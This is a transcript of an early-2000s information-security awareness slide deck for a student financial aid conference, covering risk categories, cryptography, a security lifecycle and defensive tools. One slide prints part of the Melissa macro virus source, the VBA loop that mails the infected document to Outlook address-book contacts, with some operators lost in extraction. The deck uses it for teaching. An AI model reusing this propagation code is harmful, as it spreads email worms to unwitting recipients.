Session 4: Alberto Nantiat (ENZO B) - Session 4: Sharing online content
Student Financial Assistance. Session 4 -2 Session 4 Information Security: Protecting your Digital...
-
Upload
joseph-watts -
Category
Documents
-
view
219 -
download
0
Transcript of Student Financial Assistance. Session 4 -2 Session 4 Information Security: Protecting your Digital...
-
Session 4Information Security: Protecting your Digital Resources
Session 4 -
-
Discussion AgendaGoals of an intrusionCategories of RiskEffects and consequences of a compromiseTechniques of SecurityReducing the risk - Security Lifecycle
Session 4 -
-
Intrusion GoalsDefacementUtilization of resources as an anonymous platform for other attacksPerformance degradationData collection/manipulation
Session 4 -
-
Risk CategoriesHacking - usually accomplished by known vulnerability in COTS softwareCracking - usually accomplished by guessing weak or default passwordsSpoofing - impersonation used to obtain credentials (telephonic, email, website, etc)
All 3 intend on receiving elevated privileges
Session 4 -
-
Risk Categories (cont)Trojan Horse - typically self-replicating email-based worms (i.e. Code Red)Denial - denial of service (i.e. ping flood)Sabotage - disgruntled Systems EngineerUnintentional - natural disasterand more...
Session 4 -
-
MelissaDim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") "... by Kwyjibo" ThenIf UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.CountSet AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y
Session 4 -
-
Effects of a CompromiseUnreliable data - surreptitious manipulation or explicit destructionBad neighbor - not even recognizing youve been compromised and being used as a platform for attack Performance - if there is any...
Session 4 -
-
ConsequencesFinancial - data restoration, downtime, liquidated damages, etc.Legal - due diligence is required to protect privacy act data, consumer information, etcLost Confidence - its a tough sell to say to customers/business partners it wont happen again
Session 4 -
-
Who would do such a thing...CriminalMagicianConsumer AdvocatePolitical Activist (WTO, Civil Rights, etc)Cyber-WarriorSecurity Professional*
Session 4 -
-
Core Security ServicesIdentification/Authenticationsomething you know/have/areAuthorizationproviding the right services to the right userConfidentiality Message obfuscation through cryptographyIntegrityIs that what I sent or stored?
Session 4 -
-
Cryptography 101Symmetric1 key shared between partiessimple to manage, inexpensive to deployhigh encryption speedsAsymmetric2 distinct, but mathematically related, keys for each person (one public, one private)More secure, expensive, used in PKIslower encryption speeds
Session 4 -
-
Cryptography 201Algorithm ChoicesVarious choices with different strengths/weaknesses - RC5, DES, AES, etcUsually based on hard problems (i.e. factoring involving large prime numbers)Key SizesThe larger the key, the more difficult it is to break the code
Session 4 -
-
Things to avoid in a COTS Vendor...Trust Us, were experts - Right...Secret Algorithms - So how good are they?Revolutionary Breakthrough - Security is like new pharmaceuticals, not cars.Unbreakability - no such thing (brute force)
Session 4 -
-
So how do we protect ourselves?Holistic approachDetermine the true value at risk, then determine the level of protectionBe prepared to invest financial and human resourcesBalance convenience w/securityRecognize its a journey...
Session 4 -
-
Security Lifecycle
Session 4 -
-
Plan your work A Security Policy Document is critical to successfully define minimum security criteria for a given system.
All AGI should participate and sign offTemplate can be tailored to business risk/value
Session 4 -
-
Security Policy TemplateNetwork Layer Policiesrouter, FW, DNS policiesApplication Layer Policiestoken characteristics, crypto specificationsOperating System Policiesvendors, patch levels, minimum installOperational Policiesbackups, staffing/access, incident notification/response, virus updatesSystem Architecture PoliciesIVV, imposed standards, policy maintenance
Session 4 -
-
DesignDesign in concert with the Security PlanArchitects should have security experienceDefine the resources to secure and the mechanisms to do it (i.e. SSL will be used for screens containing SSN) Select technologies that have superior track records
Session 4 -
-
DevelopDevelop in concert with the Security PlanShare the importance of security with the teamPerform peer code reviews for weakness/backdoors
Session 4 -
-
TestVulnerability Analysismeasures system exposuretools NMAP - opensource port scannerCyberScanner - commercial multi-function scannerSATAN - opensource multi-function scannerIndependent Penetration Testing3rd party verification of security status of a systemmany companies offering white-hat services
Session 4 -
-
Maintain
Two Main Aspects of Maintenance
Tool Oriented Process/Procedure Oriented
Session 4 -
-
Maintain - ToolsIntrusion Detectionactive monitoring of network protocol traffic, log files, port scanningresponses from alarms to countermeasures!i.e. ManHunt by Recourse Technologies, BlackICE Defender, Network ICEContent Monitoringactive monitoring of server file contentautomated alert/recovery on file modification (defacement)i.e. Tripwire for Servers by Tripwire
Session 4 -
-
Maintain - ToolsHoneypot Monitoringdiversionary tacticDummy site to entice, expose, then exhaust a hackeri.e. Deception ToolKit (DTK), ManTrap by Recourse TechnologiesTarpits entice then entrap self-replicatorsi.e. LaBrea
Session 4 -
-
Maintain - ProcessesSecurity Awareness Subscribe to weekly newsletters (SANS)Protect your authentication tokens no postiesno sharingReview the FBIs Top 20 Security Mistakes issued on 10/2/2001 and make sure you arent wanted! (http://66.129.1.101/top20.htm)
Session 4 -
-
Maintain - ProcessesConfiguration ManagementUse defined procedures for modificationsRequire review boardsAllow only authorized staff make changesRegular virus preventionBackup OffsiteRotated media
Session 4 -
-
Maintain - ProcessesHmm At the CERT Coordination Center, we have learned that over 95% of all network intrusions could be avoided by keeping your computer systems up to date with patches from your operating system and applications vendors. If you do nothing else, you should install these patches wherever possible, and as quickly as possible.
Session 4 -
-
Internet Resources
Session 4 -
Resource
URL
Comment
Systems Administration, Networking, and Security (SANS)
www.sans.org
Excellent email newsletter, hosts the FBI/SANS Top 20 list
CERT by Carnegie-Mellon
www.cert.org
One of the original security sites on the net
RSA Labs Cryptography FAQ
www.rsasecurity.com/rsalabs/faq/index.html
Learn how cryptography works
Attrition Hacker Site
www.attrition.org
Their motto: Dont let school get in the way of your education
PentaSafe Publications
www.baselinesoft.com
Security Policy Templates
-
Thanks for coming!This presentation will be posted at this site at the conclusion of the EAC serieshttp://edeworkshop.ncspearson.com/Thank you and see you next year!
Session 4 -